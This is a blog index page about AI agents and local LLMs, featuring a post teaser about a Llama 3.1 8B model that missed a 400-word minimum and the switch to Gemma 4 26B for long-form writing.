[bmdpat]

Writing

Blog

AI agents, runtime safety, local LLMs, and what it looks like to run a one-person AI-operated holding company in public.

Browse the notebook

Start with a topic, or open the full archive.

Full archive (140) ->
Artifact preview for My 8B Model Failed a 400-Word Taskreal test output
6 min read

My 8B Model Failed a 400-Word Task

Three Llama 3.1 8B runs missed a 400-word floor. Here is the verifier-driven route that moved long-form synthesis to Gemma 4 26B.

Read the post

The AI agent build notes

Real costs, real tools, no fluff. M-F when I ship, publish, or learn something worth sending.